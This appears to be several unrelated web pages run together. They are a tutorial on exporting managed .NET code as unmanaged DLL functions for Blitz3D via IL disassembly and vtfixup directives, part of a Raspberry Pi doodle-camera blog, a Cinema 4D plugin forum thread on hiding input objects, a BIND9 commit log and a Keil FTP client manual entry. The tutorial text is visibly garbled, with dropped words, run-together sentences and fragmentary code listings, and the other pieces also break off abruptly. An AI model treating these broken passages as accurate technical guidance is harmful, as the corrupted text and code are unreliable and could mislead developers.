- 22 May, 2000 1 commit Add missing REQUIRE tests to existing implementations. - 19 May, 2000 1 commit - 05 May, 2000 1 commit Define dns_rdata_loc_t structure. x25 length is only 8 bits. - 28 Apr, 2000 1 commit - - 21 Mar,: ---------------------------------------------------------------------- - 01 Feb, 1999 1 commit - 22 Jan, 1999 3 commits Update Copyright dates. converted frometext* to use gettoken() converted: result = foo(); if (result != DNS_R_SUCCESS) return (result); to RETERR(foo()); - 20 Jan, 1999 1 commit txt_fromwire() was not coping with a zero length active buffer. - 19 Jan, 1999 4 commits totext/fromtext should all work towire/fromwire mostly work tostruct/fromstruct return DNS_R_NOTIMPLEMENTED compare untested
https://gitlab.isc.org/isc-projects/bind9/-/commits/373ce67419680a398ba3dc51a14a486caaf0afb0/lib/dns/rdata/generic/gpos_27.c
CC-MAIN-2021-43
refinedweb
102
57.27
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode. Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript). When an Alembic camera is merged into a scene, its Attributes panel has a Camera tab with all the usual camera properties. When I drag & drop the "Focal Length" property into the python console, I'm told that its value can be obtained with: myCam[1028637,5103,500] After a bit of digging around I was able to eliminate a couple of the magic numbers like so: myCam[1028637,c4d.OBJECT_CAMERA,c4d.CAMERA_FOCUS] But how was the number 1028637 obtained? It isn't a plugin ID and there is no constant in the c4d namespace with this value. I don't like hard-coded numbers in my code, so I'd rather have a procedural way of obtaining this value. On a related note, how does C4D know that this is a camera? It's type is reported as BaseObject not CameraObject. I'd like some way of determining, in code, whether or not an object is an Alembic camera. Thanks! Hello, Some symbols are not exposed to public. There's no particular reason for that. There's no real place where all exposed symbols are. (and we agree it's could be nice) To know if a BaseObject is a camera (or something) you can use IsInstanceOf You can also send a message using the ID MSG_GETREALCAMERADATA : with an alembic generator you can use this code : camera = doc.GetActiveObject() if camera is None: return if camera.IsInstanceOf(c4d.Oalembicgenerator) == False: return # This example tries to get the internal camera from a generator. # Typically used with the Alembic Generator camera. data = {} data["res"] = None res = camera.Message(c4d.MSG_GETREALCAMERADATA, data) if res: camera = data["res"] print("Camera: " + camera.GetName()) For your next threads, please help us keeping things organised and clean. I know it's not your priority but it really simplify our work here. I've marked this thread as a question so when you considered it as solved, please change the state Cheers, Manuel
https://plugincafe.maxon.net/topic/12245/alembic-camera-properties/1
CC-MAIN-2022-05
refinedweb
369
65.12
How to Deploy Prophet by Facebook on AWS Lambda A quick look at Prophet and how it can help you As Prophet is implemented as R and Python procedure, the focus for AWS Lambda is on the Python 3.7 runtime. Hello World Depending on how you came to this story you might be asking, “What is Prophet?” Let’s quote its creators:. After testing the model locally, I got great results that made me decide to bring it to a production level. I tried to avoid ground-level work to set up an AWS EC2 instance. Therefore, I decided to go with AWS Lambda. In hindsight that sounded slightly easier than it was. Here’s how it’s done. What’s the Catch? The main challenge to be achieved in one line explained is import fbprophet . AWS Lambda out of the box obviously doesn’t come with that package preinstalled. Therefore we must do it. I found the official documentation helpful, but not sufficient to get it done. The reasons are: - The package must be installed on a replicate of the live AWS Lambda environment. Here I got stuck at first as I was “just” following the official documentation with my macOS. However, the deployment failed due to differences to the Amazon Linux environment. While one option certainly is to set up an EC2 instance online, I found an easier solution with docker-lambda. It’s a docker image to replicate the AWS Lambda environment. - Prophet needs PyStan. Since version 2.19 Stan requires a compiler which supports C++14. Long story short, we need gcc 4.9.3 or higher. As of now Amazon Linux 1 based Lambdas use gcc 4.8.5. Another time I got stuck. I figured the easiest solution was to pip install pystan==2.18instead. Another possible solution is mentioned here. - As of now, deployment packages on AWS Lambda can be max. 250 MB (unzipped, including layers). So we can’t just upload the package — we have to delete certain folders to bring the packages to that size. Credit to Alexandr who did most of the heavy lifting in his story here. Let’s Get it Done Since you’ve read this far, you might be experiencing similar problems. I tried to create a plug and play solution so you can get back to the fun part quicker than I could. - Clone or download my repository. In it, you will find a Dockerfile that will resolve all the problems I mentioned above. - Open the folder of the repository that you just downloaded. In here you can also find the file lambda_function.py. No need to edit it right now, but be aware of it. That’s the file where you can change your lambda_handler. - Now, open your terminal and cdinto the repository. Run the following command: docker build -t fbprophet . && \ docker run --rm -v $PWD:/export \ fbprophet cp upload-to-s3.zip /export This can take a few minutes. Once done, a new file upload-to-s3.zip should appear in the repository folder. That’s it. With that .zip-file you will be able to import fbprophet on AWS Lambda. As the file is larger than 50MB, you must upload via an S3 bucket. In my first tests, I chose 1024 MB Memory and 10 seconds Timeout for my Lambda function. Here’s an example set up: aws lambda create-function --function-name fbprophet \ --runtime python3.7 --handler lambda_function.lambda_handler \ --timeout 10 --memory-size 1024 \ --role arn:aws:iam::[INSERT]:role/[INSERT] If that part is not familiar to you I found these tutorials helpful: Tutorial: Using AWS Lambda with Amazon S3 Suppose you want to create a thumbnail for each image file that is uploaded to a bucket. You can create a Lambda… docs.aws.amazon.com There is also sample code for Python for that specific tutorial. Just testing? Run this command and get a ready to upload upload-to-s3.zip file for AWS Lambda: docker run --rm \ -v $PWD:/export \ marcmetz/prophet:1.0 \ cp upload-to-s3.zip /export Obviously, it’s only an example lambda_function.py in it. But you can already create a “Hello World” test event to see if the import is working. (See screenshot on top and section Invoke the Lambda Function.)
https://marc-metz.medium.com/docker-run-rm-it-v-pwd-var-task-lambci-lambda-build-python3-7-bash-c7d53f3b7eb2?source=post_internal_links---------0----------------------------
CC-MAIN-2021-17
refinedweb
719
68.77
if there's a chance to hide objects the same way it's done in GetAndCheckHierarchyClone() method. Generally GACHC is hiding children geometry without destroying their cache, and it don't reset DIRTYFLAGS_CACHE. I'd like to do the similar thing to the dependencies, which aren't children. Currently I know only Touch() method, but it reset caches and enforce all generators to be recalculated when touching the chain. I seen many similar topics were related to the Touch() method, but there were no solution. Also are there any flags to know if object is made hidden by GetAndCheckHierarchyClone? At least I try to skip Touching for these objects. GetCache() is returning some value, testing BIT_CONTROLOBJECT is not relevant as it set for both Generator and Input objects. Hello @baca, Thank you for reaching out to us. I am struggling a bit with understanding what you want to achieve here. So, you have a setup like this: P +--A | +--A1 +---B +--B1 And you want A1 and B1 to be hidden in addition to A and B? Are you using OBJECT_INPUT as a flag to register your plugin? But I think the flag only works for direct children, if you want to also hide grandchildren or any type of descendants, you will have to do that manually. You can do this with c4d.GeListNode.ChangeNbit() and the field c4d.NBIT_EHIDE. Maybe you could also just manually flag objects as BIT_CONTROLOBJECT, and by that mute their cache output, but that would be more of a hack and I would have to try myself if this would work (I doubt it will). OBJECT_INPUT c4d.GeListNode.ChangeNbit() c4d.NBIT_EHIDE BIT_CONTROLOBJECT Cheers, Ferdinand @ferdinand thanks for suggestion, I'll try it as well. Here's setup: SCENE_ROOT +--SOME_SOURCE (whole tree has to be hidden) | +--SOURCE_CHILD_1 | | +--SOURCE_GRANDCHILD_1_1 | | +--... | | +--SOURCE_GRANDCHILD_1_N | +--SOURCE_CHILD_N | | +--SOURCE_GRANDCHILD_N_1 | | +--... | | +--SOURCE_GRANDCHILD_N_N +--... +--MY_GENERATOR (has object link pointing to SOME_SOURCE) The idea is to create similar functionality as Connect object has - object link as a mesh source, and this source (whole tree) has to be hidden. Touch is resetting object cache, what I want to avoid. While GetAndCheckHierarchyClone is able to hide whole subtree, keeping it's cache. Touch GetAndCheckHierarchyClone Touch is resetting object cache, what I want to avoid. While GetAndCheckHierarchyClone is able to hide whole subtree, keeping it's cache. Touch is resetting object cache, what I want to avoid. While GetAndCheckHierarchyClone is able to hide whole subtree, keeping it's cache. I would say the last sentence is not true. GetAndCheckHierarchyClone is just a wrapper around GetHierarchyClone, which after a scenic tour through our backend, will call Touch in the case the argument dirty is True. In these cases, GetHierarchyClone will build the caches of objects, clone them and immediately after that call Touch. Touch does three things, it sets the flag BIT_CONTROLOBJECT, it flushes the caches of the object, and it resets the dirty counter. So, in the case of the argument dirty being True, the cache is being built and directly after that flushed. Setting the flag BIT_CONTROLOBJECT plus the flushing of cashes is IMHO what realizes an object being 'hidden'. No caches will prevent the object from being drawn, and BIT_CONTROLOBJECT will prevent the caches from being rebuilt automatically. What happens in the case when dirty is False, i.e., the default case, is a bit harder to assess, as the code to cover then becomes much larger, and I do not have the time to cover it all. My assumption would be, however, that caches are also flushed, as this is the only way I can see this hiding to work. GetHierarchyClone dirty True False The underlying problem here is that the classic API scene graph has no true dependency graph for its scene elements, the dirty system is what fulfils that function, but it does not tell you what is related to what. Which has led to the problem that things that might seem trivial are not, because everything has its little algorithm on top of algorithms to determine its dependencies. Long story short: I would still recommend NBIT_EHIDE as a solution to your problem and also have provided an example for that at the end. The problem here is that while everything works fine and dandy while some object is an input object, it does not anymore when the users removes the object from that relation: NBIT_EHIDE SceneRoot +--Plugin +--A [hidden] | +--B [hidden] +--C [hidden] Plugin considers A, B, and C its input objects and has hidden them manually with NBIT_EHIDE, everything is working fine, yay! But wait, now the users moves B outside of the scope of what Plugin considers to be its inputs: SceneRoot +--Plugin +--A [hidden] +--C [hidden] +--B [hidden] B is still hidden, but it should not be anymore. There is also no event being published inside of Plugin which would signal B being moved out of Plugin. I have solved this with a tag, but this is also a very hacky solution. I would assess if these requirements of yours are indeed irremovable requirements. If I would be implementing this, I would simply cut features to avoid having to deal with this specific scenario. The result: The example 'implements' a loft object which accepts a hierarchy of spline objects as inputs (the hierarchy is flattened depth first and fed into a normal loft object). The hiding and unhiding of the input objects is realized NBIT_EHIDE and controller tags on each object (which are hidden themselves). The code: import c4d UNHIDER_TAG_CODE = """ '''Implements a tag which unhides its host object when it is not (indirectly) parented anymore to an Oinputobject node. It therefore realizes the counterpart to the hiding done in InputObjectData.GetInputs(). This is still a hack and I would not recommend doing it. If done more nicely, one should implement it as its own TagData plugin and spend more time on testing/assuring that an object cannot "glitch out" than I did here, as the result will be an unusable scene for the user. ''' import c4d Oinputobject = 1059626 def main() -> None: '''Unhides the object this tag is attached to if none of the ancestors of the object is an Oinputobject node. ''' def is_input_object(node: c4d.GeListNode) -> bool: '''Determines of any of the ancestors of #node is an Oinputobject node. ''' while node: if node.CheckType(Oinputobject): return True node = node.GetUp() return False # Get the object the tag is attached to and unhide the object when none of its ancestors is # a node of type Oinputobject. host = op.GetMain() if not is_input_object(host): host.ChangeNBit(c4d.NBIT_EHIDE, c4d.NBITCONTROL_CLEAR) """ class InputObjectData(c4d.plugins.ObjectData): """Implements a generator object which hides all its descendant nodes from the viewport. """ PLUGIN_ID = 1059626 @classmethod def GetInputs(cls, node: c4d.BaseObject, hh: any) -> tuple[c4d.BaseObject]: """Returns a list of clones of all descendants of #node and hides the original nodes. """ def iter_node(node: c4d.GeListNode) -> c4d.GeListNode: """Walks the sub-graph of a node depth-first. """ if node is None: return while node: yield node for descendant in iter_node(node.GetDown()): yield descendant node = node.GetNext() def callback(node: c4d.BaseObject) -> c4d.BaseObject: """Clones a node, hides the source node from the viewport, and attaches a tag which ensures that the object unhides itself once it is not an input object anymore. """ clone = node.GetClone(c4d.COPYFLAGS_NO_HIERARCHY) node.ChangeNBit(c4d.NBIT_EHIDE, c4d.NBITCONTROL_SET) # Exit when the node has already an "unhider" tag. tag = node.GetTag(c4d.Tpython) if isinstance(tag, c4d.BaseTag) and tag[c4d.TPYTHON_CODE] == UNHIDER_TAG_CODE: return clone # For more production ready code, I would recommend implementing the tag as a TagData # plugin. This would also make identifying an already existing "unhider" tag robust # via its plugin id. # Create the "unhider" tag, set the Python code and hide the tag from the users view. tag = node.MakeTag(c4d.Tpython) tag[c4d.TPYTHON_CODE] = UNHIDER_TAG_CODE tag.ChangeNBit(c4d.NBIT_OHIDE, c4d.NBITCONTROL_SET) return clone # Collapse all descendants of #node to a list of clones and hide each source node. return tuple(callback(n) for n in iter_node(node) if n is not node) def GetVirtualObjects(self, op, hh): """Implements a loft object which takes into account all its descendants for building the loft and not only the direct children. This is not fully fleshed out and serves only as an example for the case of hiding inputs. """ # Get and handle the input objects; or get out when there are not enough inputs. profiles = InputObjectData.GetInputs(op, hh) if len(profiles) < 2: return c4d.BaseList2D(c4d.Onull) # Create the loft object and parent the flattened inputs as direct children. loftNode = c4d.BaseList2D(c4d.Oloft) loftNode[c4d.CAPSANDBEVELS_CAP_ENABLE_START] = False loftNode[c4d.CAPSANDBEVELS_CAP_ENABLE_END] = False for item in profiles: item.InsertUnder(loftNode) return loftNode if __name__ == "__main__": c4d.plugins.RegisterObjectPlugin( id = InputObjectData.PLUGIN_ID, str = "Input Object Host", g = InputObjectData, description = "oinputobject", icon = None, info = c4d.OBJECT_GENERATOR) @ferdinand said in Touch input objects withot resetting its cache: NBIT_EHIDE Sorry Ferdinand, I might be not a great explainer... But that not I actually need. This bit only hides object in Editor, in Render it's still visible. So Touch() is the only way to truly hide the object. My only issue is that I'm trying to hide all nested objects with Touch(). And when I'm doing it I'm also touching the grandchildren, and this cause their parent to be rebuilt. I'm looking for a way to skip objects which already touched by their parent generator. To be clear, here's the use case: +--Null whole tree has to be hidden | +--Loft has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden | | +--Circle has BIT_CONTROLOBJECT — already hidden by parent Loft, has to be skipped | +--Loft has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden | | +--Cube has BIT_CONTROLOBJECT — not hidden by parent Loft, has to be hidden +--... +--MY_GENERATOR has object link pointing to Null, it wants to hide this Null whole tree has to be hidden has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden has BIT_CONTROLOBJECT — already hidden by parent Loft, has to be skipped has BIT_CONTROLOBJECT — not hidden by parent Loft, has to be hidden has object link pointing to Null, it wants to hide this Null If I'll try to Touch() Circle spline, then it's parent Loft would be continuously regenerating, so MY_GENERATOR would be also continuously regenerating, because source dirtiness is changed. If I'll try to skip Touch() children of objects with OBJECT_INPUT set, then Cube under Loft would be visible - because it wasn't touched by its parent Loft as Cube is not a spline object. So either I go into regeneration loop, either I'm not hiding objects. But I want both performance and hide. Hey @baca, as I said, the control object structure you want is not possible. I tried and wrote the necessary code when I answered here initially, and Cinema 4D will really start to freak out. You cannot have nested hierarchies of muted caches. If you really want to do this, then you must use the approach proposed by me. If you want to also hide the objects in renderings, then you will have to also set that parameter. If you poke around long enough, you might find a solution by muting the caches, but this is out of scope of support. As I said, I did already try when I wrote my first posting, maybe you have more luck. But as also stated in my first posting, you are poking here the sleeping bear called "classic API node dependencies".
https://plugincafe.maxon.net/topic/14048/touch-input-objects-withot-resetting-its-cache
CC-MAIN-2022-27
refinedweb
1,924
62.68
Well. I'm having a little bit of an issue, and I'm taking it's just from my absolute lack of experience with C++ atm. But hey, lets give this a go. So, I'm constructing a little menu system. So, I'm using the Do..While statement, while in one itself. (Mind you, I'm still on the first few lessons, but I'm still fiddling around with them. So I'll gladly take some advice on better methods, though I'm not sure if I'll understand it at this time.) So here's my code so far. So, this code is quite incomplete. I'm still at the first stage of making it. Basically, (it's supposed to) work like this:So, this code is quite incomplete. I'm still at the first stage of making it. Basically, (it's supposed to) work like this:Code: #include <iostream> using namespace std; int main() { int input; int menu1; int menu2; int menu3; int menu4; int menu5; menu1 = 0; menu2 = 0; menu3 = 0; menu4 = 0; menu5 = 0; do { cout<<"Choose an Option.\n"; cout<<"1. Option 1.\n"; cout<<"2. Option 2.\n"; cout<<"3. Option 3.\n"; cout<<"4. Option 4.\n"; cout<<"5. Option 5.\n"; cout<<"0. Exit.\n"; cout<<"Selection: "; cin>>input; }while (input != 0); switch ( input ) { case 1: do { cout<<"1. Sub1 Option 1.\n"; cout<<"2. Sub1 Option 2.\n"; cout<<"3. Sub1 Option 3."; cout<<"4. Sub1 Option 4."; cout<<"5. Sub1 Option 5."; cout<<"9. Exit."; cin>> menu1; }while ( menu1 != 9 ); } } You choose option 1, it brings to a submenu. Then, you can choose one of the sub-submenu's. In the end, it'll be similar to a pyramid. So a quick explanation of the variables. Input is the main input - for the first menu. Then, Menu1 controls the first submenu. So from the code I have, in essence, at the end, I could put }while ( menu != 9 && input != 0 ) and I (believe) it would still work out. It's just running both subs. But, when I run this code, it doesn't move on from one menu to another. (Though I've only done the first sub-menu.) So when I push 1, it should move to the first case, but it doesn't. So what have I got wrong, here?
http://cboard.cprogramming.com/cplusplus-programming/121180-do-while-switch-printable-thread.html
CC-MAIN-2014-49
refinedweb
393
86.6
Exporting Managed code as Unmanaged I. Introduction The following Article explains in detail how to use any .NET Assemblyfrom BlitzPlus/Blitz3D. The Exported code presented here can actually be used withany other unmanaged code wich supports loading of DLL's, but I choose Blitz3D asa reference here, because I needed this support for Blitz at time of writing. This Article focusses on how to use a DLL created with the Microsoft.NET Framework with Blitz. I have written this article since I personallybelieve, the .NET Framework is the best that ever happened to theprogramming part of the world, and I found it unbearable that Blitz couldnot utilize the potential power it offers in terms of both Game and Applicationdevelopment. In this article I am going to assume a few things about you. - You know what the .NET Framework is and how it works. - You know how to use at least 1 .NET enabled programming language like C# (C-sharp), VB.BET, Managed C++, IL, etc. - You know about IL Code, the IL Assembler and Disassembler.You do not have to be a guru, just some knowledge aboutit's existance will do, I will try to explain as much about itas possible.This is actually an important part, since the actual code exportingis done using IL Code. - You know how Blitz userlibs work. If either of these items are not met, I suggest you try and learn about thosebefore you continue with this article. I will try to explain all the stepsinvolved as good as I can, so a complete newbie should be able to use it as well,but lack of knowledge about some of these items might get you into trouble at some stage. <!– ### Requirements ##################################################### –> II. Requirements Goodyour Blitz DLL's with .NET is not hard, but it will require you topay attention to some details about the gory CLR internal workings. If you got all this sorted, we're ready to rock! <!– ### Getting Started ##################################################### –> III. Getting Started Nowusing the .NET framework and any language it supports.From here on I will be using C#, since I consider it the best language ever tobe created, but the sample should not be too hard to convert to your own liking. Below is the code for my simple dll. // HelloWorldDll.cs using System; namespace HelloWorldDll { public class HelloWorldClass { public static string SayHello(string name) { return ("Hello " + name); } } } Up until now, this should appear pretty straightforward to any of you.I didnt do anything special. just create a namespace HelloWorldDll.Create a class called HelloWorldClass. and give it 1 method called SayHello(string name). Now, all our function does is take a string value as a parameter, combine it withthe string "Hello " and return the resulting string. Note that I have made the class PUBLIC. this is NOT required! it does not matterhow you define your class for the final result to work. it's just cos I felt like doingit this way. The same goes for the function declaration. Your function does not have to bepublic or static for that matter. just use whatever suits your needs. The reason I used a parameter and a return value, is because I want to show you thatpassing codewich has exactly the same fields as the struct in your .NET assembly. Example: // C# public struct SomeStruct { public int X, Y, Z; public string Name; public object Obj; } ;// Blitz Type SomeType Field X, Y, Z Field Name$ Field Obj End Type Te above will work if you pass an instance of your SomeType Type to the function as a parameter.The only limitation is the fact that you cannot have the .NET function have such a struct as a returnvalue. Just pass the instance as as a parameter and have it filled like that. Example: // BAD publiccommandyour working directory. <!– ### The Real Business ##################################################### –> IV. The Real Business Now it's time to get down n dirty. We need to create a Dll wich normally runsin a managed environment, and have it work with completely unmanaged code.How, o, how do we fix this??First of all, Exporting managed code for use in unmanaged assemblies/code isnormally possible through a technology called COM interop. This basicly meansthat you create a COM interface for your DLL and have the unmanaged code use thistoassembly version of the .NET Framework. Tt behaves like Java Bytecode,or at least, it performs the same task, in that IL Code is the Final step thatALL .NET languages like C#, VB.NET, C++ etc get to before being compiled tonative machine code (by the JIT compiler). Meaning that all these languagesUltimatly compile to Pure IL Code. It is this IL Code, wich makes sure that all the previously name d langua gescan be used with eachother, and wich (theoreticly) makes any .NET assenbly Platformindependant. This IL Code is compiled into the resulting Exe or Dll, together with anextensive description of it's actuall contents, called MetaData. What we are interested in, is the IL Code itself. As I just explained, this is storedin the final Exe/Dll, so we need a way to extract it. The answer to this is the niftylittleconsider it a bug or a feature. Personally I think it's great for learningpurposes and situations such as the one we face in this article, where a regularlanguage just wont cut it, and we need that extra edge IL code offers. To Business. We will now decompile our dll into IL code, so we can edit it around a bit and thendll contains forms and controls and such, but in our case it's just a file waitingto be deleted. The file of interest is, offcourse, HelloWorldDll.ilOpen it in a text editor and be amazed at the mess you see.Please dont get put off by the garbled presentation of the code,since it's really not that bad. First of all, you may want to clean itup a bit by removing all the residual blank lines and unsightly comments (starting with '// ..') Note that this is NOT needed!. this code will compile into a dll perfectly, it's justto make life easier on you when you edit the code. Below is what our IL Code should look like after cleaning it up.All I am leaving in there is the relevant parts. eg: the parts we need for our final DLL .corflags 0×00000001 } } } Now isn't that beautifull? :DAs you can see, IL looks like a genuine programming language! :)In effect, it is a genuine programming language, because you can actuallywrite your programs straight in IL if you want. It's a pretty straigh forwardlanguage. Easy to understand as well. Not anything at all like MASM32 or TASM or anyof that stuff. IL Code is a Stack Based Assembly language. The big difference withlanguages like MASM32 and TASM is that IL does NOT use Registers, but all isdone through the Stack and Heap. But thats all gory details wich you probablywontabout. The book explains a lot of the really gory details about the inner workings ofIL code, the CLR and also Why it works the way it does. VERY interesting read!Btw. if you ever need to ask Mr. Lidin some questions about IL, I happen to know he frequentlyvisits the IL Code Forum on Anyways… we want to export our code for use in blitz.So let's get to it. First we will change the line that says: .corflags 0×00000001 into: .corflags 0×00000002 Why? Well, this flag is part of the Common language Runtime Header, wich tellswindows that it's dealing with a genuine .NET assembly and not a regularwindows executable. This value is, by default, always set to COMIMAGE_FLAGS_ILONLY (0×00000001)This means that the assembly contains only Pure IL Code. So no Embedded native/unmanagedcode is present in the Exe or Dll. COMIMAGE_FLAGS_ILONLY (0×00000001) The Image Flags contains IL Code Only. with no embedded native unmanaged code, exceptthe startup stub. Because Comon Language Runtime – aware Operating Systems (such as Windows XP)ignore the startup stub, for all practicle Purposes the file can be considered Pure-IL.However using this flag can cause certain IlAsm compiler-specific problems when running underWindows XP. If This flag is set, WinXP ignores not only the startup stub but also the .relocsection.×00000002) COMIMAGE_FLAGS_32BITSREQUIRED (0×00000002) The Image file can be loaded only into a 32-bit process. This flag is set wheb native unmanaged codeis embedded in the PE file or when the .reloc section is not empty. Next up: Reserving some space in our final Dll to store the address of our function.This will be filled at runtime with the actual address of the function, we just need toreserve the space. In order to expose managed methods as unmanaged exports, the ILAsm compiler builds a v-Table,A v-Table Fixup (VTableFixup) table, and a group of unmanaged export tables, wich include theExport Address Table, the Name Pointer Table, the Ordinal Table, the Export Name Table and theExport Directory Table. The VTableFixup table is an array of VTableFixup Descriptors with each Descriptor carying the RVAof a v-table entry, the number of slots in the entry, and the binary flags indicating the sizeof each slot (32 or 64 bit) and any special features of the entry. Each slot of a V-table in a managed PE File carries the token of the method the slot represents.At runtime the V-table fixups are executed, replacing the method tokens with actual methodaddresses. The IlAsm syntax for a v-table fixup is: .vtfixup [<num_slots>] <flags> at <data_label> Note that the square brackets in [<num_slots>] are part of the statement, and do notmean that <num_slots> is optional! <num_slots> is an Integer constant indicating the number of v-table slots groupedinto one entry because their flags are identical. This serves no other purpose except tosave space in your Code file. you can use a seperate .vtfixup statement for each method ifyou lik e.VTableFixup descriptors in the VTableFixup table.The Vtable entries are defined simply as data entries. Note that the VTable mustbe contiguous. I other words, the data definitions fot the vtable entries must immediatly followonecompiler and placed in designated vTable slots. To achieve that, it is necesarry to indicatewichin the following code: … .vtfixup [1] int32 fromunmanaged at VT_01 .data VT_01 = int32(0) // alays use 0, the slot will be filled // automaticly at runtime .method public static void Foo() { .vtentry 1 : 1 // entry 1, slot 1 } The ILAsm syntax for actually declaring a method as exported code is quite simple: .export [<ordinal>] as < ;export_name> Where <ordinal> is an integer constant. The <export_name> provides an alias for theexported #### -> Change Image CoreFlag to // COMIMAGE_FLAGS_32BITSREQUIRED to fix the potential WinXP pitfall .corflags 0×00000002 // ###) { // ### CHANGE #### -> Specify wich VTable entry to use // for this function .vtentry 1 : 1 // ### CHANGE #### -> Export the method as unmanaged code with // the alias "SayHello" .export [1] as SayHello } } } There ya go! we're done! :)After all the theoretical mumbo-jumbo it seemed a daunting task, but as you see,it requires that you add just a few lines of code and your set. Really no big deal.Time to re-compile our dll and use it in blitz! <!– ### Finalize ##################################################### –> V. Finalize Save! To test it, copy the Dll into the Blitz3D\Userlibs\ directory and create a new textfile calledHell! Regards, Jim Teeuwen.
http://www.csharphelp.com/2007/03/exporting-managed-code-as-unmanaged/
CC-MAIN-2014-10
refinedweb
1,895
66.13
React FileSystem Treeview (react-fs-treeview)React FileSystem Treeview (react-fs-treeview) Specify a path of a directory on your machine and this component will render a treeview of the path including its child files/folders. This component uses lazy loading of the children hence making it blazing fast. FeaturesFeatures - Deep nesting of folders till nth level. - Lazy loading of child nodes. - Bookmark a file. - Rename a node. - Delete a node - Drag/Drop a node to another folder. - Resizable frame. ScreenshotScreenshot Youtube ScreencastYoutube Screencast InstallInstall npm i react-fs-treeview Import the modal.Import the modal. import Tree from "react-fs-treeview"; UsageUsage <Tree className="class1 class2 class3" basePath="/var/www/html" disableContextMenu={false} onItemSelected={selectedItem => console.log(selectedItem)} /> Note: For actions like listing of trees, Rename, Delete, Moving items, it is required to run the treeview server. The server code can be found at: ./dist/server/server.js. Incase if you wish to run the server on the non-default host or port i.e., set an env variable fsTreeViewUrl and set its value to the server url. PropsProps basePath : (string) Path of the folder. className : (object) CSS class(es) that you would like to apply to the treeview disableContextMenu : (boolean) If true will show the options (Rename, Delete and Bookmark) when right clicked on a file/directory. Defaults to false. onItemSelected : (callback) function called when a file/folder is clicked
https://www.npmjs.com/package/react-fs-treeview
CC-MAIN-2021-25
refinedweb
232
60.01
The previous post walked through the first several parts of this project, namely the voice activation and object detection. This time, we will wrap up the remaining software and hardware components to build a complete object detection doodling camera. After the previous object detection step, the bounding box, class, and score for each detection will be available. The size and center location of an object can be further obtained from the bounding box values. The trick of creating the almost non-repetitive and high-resolution drawings is to apply the Google quick draw datasets where each drawing is recorded as stroke coordinates on a canvas. Take a look at 103,031 cat drawings made by real people on the internet here. The following code snippet shows you how you can turn the first "cat" drawing strokes into an image. import gizeh as gz from matplotlib import pyplot as plt from PIL import Image %matplotlib inline from drawing_dataset import DrawingDataset dataset = DrawingDataset('./data/quick_draw_pickles/', './data/label_mapping.jsonl') dataset.setup() strokes = dataset.get_drawing('cat', 0) lines_list = [] for stroke in strokes: x, y = stroke points = list(zip(x, y)) line = gz.polyline(points=points, stroke=[0, 0, 0], stroke_width=6) lines_list.append(line) lines =gz.Group(lines_list) surface = gz.Surface(width=300, height=300, bg_color=(1, 1, 1)) lines.draw(surface) plt.imshow(surface.get_npimage()) dataset.get_drawing() For example, the second stroke for this cat has 3 points drawn from right to left. Since the SSD Thermal printers are also known as receipt printers. They're what you get when you go to the ATM or grocery store. It works by heating up dots on thermal paper which is coated with material formulated to change color when exposed to heat, so there is no need for ink. This printer is ideal for small embedded systems such as Raspberry Pi and even microcontrollers since it communicates with the application processor by TTL serial port and powered by 5-9 VDC @ 1.5Amp during print. As long as your system have an extra serial port, there is no additional printer driver necessary, which means you can use the Python printer library across OS, whether it is Ubuntu PC, Windows PC or Raspberry Pi. My Python printer library has several improvements compared to the original Adafruit library for both the speed and stability when printing large bitmap images. An image will first be converted to a binary bitmap then printed row by row. The "denser" a row is, the more heating time it is required by the printer otherwise blank lines could appear. Dynamically calculating the printing time for each line achieves optimal speed and stability. Take this 8 x 8 binary bitmap as an example, row 1 has 4 dots to print and row 5 has only 2 dots, it requires a little bit longer to print row 1 than row 5. Since the maximum width can be printed on the thermal paper is 384 pixels, we will first flip the drawing image by 90 degree to print it vertically line by line. It is also necessary to adjust its baud rate to 115200 from its default 19200 or 9600 to achieve faster bitmap printing on a thermal printer since sending a complete 384 by 512 bitmap through a serial port takes a lot of bandwidth. I have attached a tool to complete this on my GitHub. Voice activation without any response or feedback can ruin the user experience, that is why we add a single LED to blink in different patterns to show whether a voice command is detected. An additional push button also provides an extra option to trigger the camera capture, object detection, drawing, and printing workflow. The gpiozero Python library came with the Raspberry Pi system provide a quick solution to interface with its IO pins. It allows you to pulse or blink LEDs in a variety of fashions and handle the timing using a background thread without further interaction. A push button can trigger a function call in simply two lines. button = Button(button_pin) button.when_pressed = callback_function All the GPIO usages are defined in ./raspberry_io/raspberryio.py file in case you want to change how the LED blinks and pluses. While it is possible to obtain a powerful 5V power bank supply current at 3Amp, it might be too chunky to fit inside our camera box. Using a compact two cells 7.4 v lipo battery to power up Raspberry Pi and the thermal printer at the same time seems like a variable way to go. You can power the thermal printer directly by the 7.4 V battery while Raspberry Pi take 5V power supply, that is where the DC-DC buck module comes to play. It is a switching power supply steps down voltage from its input to its output. I am using an LM2596 DC to DC Buck Converter as you can see on Amazon. There is a little potentiometer on the module to adjust the output voltage. With the battery connected to its input power and ground pins, turn the little nob on the potentiometer while monitoring the output voltage with a multimeter until it reaches 5V. Here is the final complete diagram shows you how parts are connected. Feel free to leave a comment if you have a question about building your object detection and doodling camera.Share on Twitter Share on Facebook
https://www.dlology.com/blog/diy-object-detection-doodle-camera-with-raspberry-pi-part-2/
CC-MAIN-2018-47
refinedweb
898
62.27
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4) #include <net_config.h> void *ftpc_fopen ( U8* mode); /* Pointer to mode of operation. */ The ftpc_fopen function opens a local file for reading or writing. The argument mode defines the type of access permitted for the file. It can have one of the following values: The ftpc_fopen function is in the FTPC_uif.c module. The prototype is defined in net_config.h. Note The ftpc_fopen function returns a pointer to the opened file. The function returns NULL if it cannot open the file. ftpc_fclose, ftpc_fread, ftpc_fwrite #define LOCAL_FILE "Test.bin" void *ftpc_fopen (U8 *mode) { /* Open local file for reading or writing. If the return value is NULL, */ /* processing of FTP Client commands PUT, APPEND or GET is cancelled. */ return (fopen (LOCAL_FILE, .
https://www.keil.com/support/man/docs/rlarm/rlarm_ftpc_fopen.htm
CC-MAIN-2020-34
refinedweb
130
61.02
